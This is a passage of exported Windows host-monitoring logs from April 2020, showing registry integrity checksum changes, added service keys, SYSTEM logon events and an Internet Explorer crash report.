'030d611a72a7eb8e7814b5bdbc71252c' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'ce2026c1928b1e5b4dddcd6c8c8960d2f55deb83' +", +"Apr 24, 2020 @ 12:36:00.209",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : '4575da043f4705e4cda975639ce4e20a' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : '8b536537786ff4e6f6c150f125173760806bda04' +", +"Apr 24, 2020 @ 12:35:59.961",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:59.944",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:59.319",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '720aee2eb36c72739680c5d0f2d3f831' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : 'c10eaf675fa276de7f1560b062ddad5ad7c82d49' +", +"Apr 24, 2020 @ 12:35:59.163",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '7827cdf50f1c1510f128b8c606a72a40' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : '2808e60b637fd5654df187601594630e29417c14' +", +"Apr 24, 2020 @ 12:35:58.714",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:58.695",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:58.460",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '030d611a72a7eb8e7814b5bdbc71252c' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'ce2026c1928b1e5b4dddcd6c8c8960d2f55deb83' +", +"Apr 24, 2020 @ 12:35:57.381",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 12:35:56.044",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '7aee7bc72edb4bc8c3add7fdc8bb1984' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : '036d6d59a18473645e40517d1076ae9bc8dc9f38' +", +"Apr 24, 2020 @ 12:35:52.132",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 12:35:49.881",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 12:35:49.866",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 24, 2020 @ 12:35:44.226",4,"Summary event of the report's signatures",,"""Fault bucket 1751705833141718957, type 1 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: iexplore.exe +P2: 11.0.18362.1 +P3: 9a0cc333 +P4: StackHash_abcc +P5: 0.0.0.0 +P6: 00000000 +P7: c0000005 +P8: PCH_0F_FROM_ntdll+0x00071F06 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BEA.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER991A.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER995A.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9967.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9988.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_iexplore.exe_e01d11a8d43b22eaaff745cb40a172102c8fbc5_e2d05f28_92ba00f4-b9ba-4a0d-9251-82f2b65a0770 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: e95a160c-287c-4dd3-b0d3-bd19323424c0 +Report Status: 268435456 +Hashed bucket: 310cd3b51d8b8eacf84f4f2c9f644fad +Cab Guid: 0""" +"Apr 24, 2020 @ 12:35:43.366",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 12:35:42.898",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:32:40Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:35:41.309",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:41.302",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:40.473",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:40.449",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:39.304",9,"Windows Application error event",,"""Faulting application name: iexplore.exe, version: 11.0.18362.1, time stamp: 0x9a0cc333 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x31007f9d +Faulting process id: 0x1ad8 +Faulting application start time: 0x01d61a34daaec983 +Faulting application path: C:\Program Files (x86)\Internet Explorer\iexplore.exe +Faulting module path: unknown +Report Id: e95a160c-287c-4dd3-b0d3-bd19323424c0 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 24, 2020 @ 12:35:38.866",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:35:37.993",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:37.963",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:37.363",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 12:35:35.043",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '78323ea3ceb69762cc6ae0082026f7e0' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '6181121dcbdc3776ce74ce2fb5dbbc4ee3941772' +", +"Apr 24, 2020 @ 12:35:32.913",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '339bd5f6323f86e44c14e44460b37d9c' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '48ed85cb3687b6e8ddca4274ae15d32bd057e1fc' +", +"Apr 24, 2020 @ 12:35:31.819",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : '6b8de7ac97580730878264d40bbc55c7' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : 'e152cdbaf5e9c36d8fec5261f4bd5cc400074ae4' +", +"Apr 24, 2020 @ 12:35:31.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f376' was added. +", +"Apr 24, 2020 @ 12:35:31.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f376\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:35:31.663",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:26.828",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : 'ee38da5389ff35503e79da17c835ef46' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '1aa6a80cb9695b7805c766e12ee865293298221d' +", +"Apr 24, 2020 @ 12:35:25.584",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '78323ea3ceb69762cc6ae0082026f7e0' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '6181121dcbdc3776ce74ce2fb5dbbc4ee3941772' +", +"Apr 24, 2020 @ 12:35:20.740",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '341edd9e8a707bf5c4441f7b25f73805' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '9e8dc617f8f05524df1b935132dc5be532bcad12' +", +"Apr 24, 2020 @ 12:35:20.037",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '0a0b254c1bfe62696355ea4bfe6bc885' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : 'bdcba87497ca250326cd9bbf4bae8edd682deb05' +", +"Apr 24, 2020 @ 12:35:19.037",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 12:35:12.635",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:35:11.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : 'e423b997502150974c87f876a8eb1d42' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : '31539f3fe106119cfe011ff7b584676a40c751ed' +", +"Apr 24, 2020 @ 12:35:04.584",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : 'b3a7e0b6a86fb9a7e57f249f44a1d457' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '069910dca69a078a6727ed745f10748332bb3a60' +", +"Apr 24, 2020 @ 12:35:01.116",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:01.085",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:01.022",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:01.007",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:00.731",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:00.709",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:00.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:00.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:59.927",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:59.897",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:59.771",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '030d611a72a7eb8e7814b5bdbc71252c' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'ce2026c1928b1e5b4dddcd6c8c8960d2f55deb83' +", +"Apr 24, 2020 @ 12:34:58.521",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:58.506",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:58.350",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:58.334",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:58.239",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f376' was added. +", +"Apr 24, 2020 @ 12:34:58.206",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:55.740",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376' was added. +", +"Apr 24, 2020 @ 12:34:55.725",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 12:34:55.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 12:34:55.693",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 12:34:55.677",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 12:34:55.662",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:34:55.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:55.460",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 24, 2020 @ 12:34:54.412",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f376' was added. +", +"Apr 24, 2020 @ 12:34:54.397",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:54.138",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : '6acd235b302dc5aaee83349dac1165e6' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : '461f97efa7f1d513debf38f2b5538116720daa17' +", +"Apr 24, 2020 @ 12:34:54.119",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7b9a258df5c6f99956d6f9b3e3d7ae65' +New md5sum is : '816e4c6e0ef2bfa0679631e42e89c389' +Old sha1sum was: 'f43e91a27dea3b358a46525fb4a5655eb79a3977' +New sha1sum is : 'b8924f00f04db3ced0f56da547b0a3acc41c2b86' +", +"Apr 24, 2020 @ 12:34:54.084",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'f2d628e8126f35291c90bff7ffc31c08' +New md5sum is : '670134df316a926943855f8acd757504' +Old sha1sum was: '34b84884b9283368a58ac1de788d118fbab8ff2a' +New sha1sum is : '29a8c6e44c36ecd807e95bf7a205245485d3171e' +", +"Apr 24, 2020 @ 12:34:51.427",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:51.401",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:50.380",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"Apr 24, 2020 @ 12:34:45.875",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:34:36.896",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +", +"Apr 24, 2020 @ 12:34:25.954",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:33:23Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:34:20.382",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:34:01.181",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:36.229",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 